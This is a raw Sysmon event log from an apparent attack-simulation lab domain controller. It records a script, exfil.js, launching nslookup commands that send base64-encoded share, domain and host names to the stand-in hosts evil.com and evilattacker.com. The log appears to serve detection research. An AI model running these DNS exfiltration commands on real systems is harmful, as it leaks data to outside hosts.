C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A4D-6078-BB0E-00000000AE01}3868C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxzliy.tmp 2>&1 154100x800000000000000070581Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:53.405{A8622C2F-5A4D-6078-BB0E-00000000AE01}3868C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxzliy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000070512Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:35.856{A8622C2F-5A3B-6078-BA0E-00000000AE01}4256C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A3B-6078-B80E-00000000AE01}5756C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljdymc.tmp 2>&1 154100x800000000000000070501Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:35.827{A8622C2F-5A3B-6078-B80E-00000000AE01}5756C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljdymc.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000070480Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:33.473{A8622C2F-5A39-6078-B70E-00000000AE01}7016C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evilattacker.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A39-6078-B50E-00000000AE01}6432C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlipwbc.tmp 2>&1 154100x800000000000000070467Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:33.442{A8622C2F-5A39-6078-B50E-00000000AE01}6432C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlipwbc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000070437Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:31.449{A8622C2F-5A37-6078-B40E-00000000AE01}3220C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A37-6078-B20E-00000000AE01}5368C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqaetol.tmp 2>&1 154100x800000000000000070426Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:31.417{A8622C2F-5A37-6078-B20E-00000000AE01}5368C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqaetol.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000070369Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:23.351{A8622C2F-5A2F-6078-B10E-00000000AE01}6824C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A2F-6078-AF0E-00000000AE01}1536C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllgx.tmp 2>&1 154100x800000000000000070358Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:23.321{A8622C2F-5A2F-6078-AF0E-00000000AE01}1536C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllgx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000070345Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:22.341{A8622C2F-5A2E-6078-AE0E-00000000AE01}4680C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000070331Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:20.599{A8622C2F-5A2C-6078-AD0E-00000000AE01}5116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000070319Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:19.932{A8622C2F-5A2B-6078-AC0E-00000000AE01}2584C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000070310Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:19.266{A8622C2F-5A2B-6078-AB0E-00000000AE01}4420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000070293Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:17.502{A8622C2F-5A29-6078-AA0E-00000000AE01}4164C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000070281Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:16.836{A8622C2F-5A28-6078-A90E-00000000AE01}2344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000070271Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:16.169{A8622C2F-5A28-6078-A80E-00000000AE01}5308C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000070228Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:05.779{A8622C2F-5A1D-6078-A70E-00000000AE01}728C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A1D-6078-A50E-00000000AE01}1736C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmeikeci.tmp 2>&1 154100x800000000000000070217Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:05.750{A8622C2F-5A1D-6078-A50E-00000000AE01}1736C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmeikeci.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000070192Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:01.907{A8622C2F-5A19-6078-A40E-00000000AE01}5420C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtMjgx evilattacker.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A19-6078-A20E-00000000AE01}5864C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtMjgx evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljqsswr.tmp 2>&1 154100x800000000000000070181Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:01.875{A8622C2F-5A19-6078-A20E-00000000AE01}5864C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtMjgx evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljqsswr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000070154Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:59.545{A8622C2F-5A17-6078-A10E-00000000AE01}3868C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A17-6078-9F0E-00000000AE01}4856C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbbmco.tmp 2>&1 154100x800000000000000070143Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:59.512{A8622C2F-5A17-6078-9F0E-00000000AE01}4856C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbbmco.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000070101Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:53.227{A8622C2F-5A11-6078-9E0E-00000000AE01}1476C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A11-6078-9C0E-00000000AE01}5052C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnnrms.tmp 2>&1 154100x800000000000000070090Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:53.198{A8622C2F-5A11-6078-9C0E-00000000AE01}5052C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnnrms.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000069984Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:35.674{A8622C2F-59FF-6078-9B0E-00000000AE01}5952C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-59FF-6078-990E-00000000AE01}6852C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqqd.tmp 2>&1 154100x800000000000000069973Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:35.646{A8622C2F-59FF-6078-990E-00000000AE01}6852C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqqd.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000069926Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:23.137{A8622C2F-59F3-6078-980E-00000000AE01}4256C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-59F3-6078-960E-00000000AE01}5620C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzeae.tmp 2>&1 154100x800000000000000069915Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:23.108{A8622C2F-59F3-6078-960E-00000000AE01}5620C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzeae.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000069902Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:22.335{A8622C2F-59F2-6078-950E-00000000AE01}7016C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program 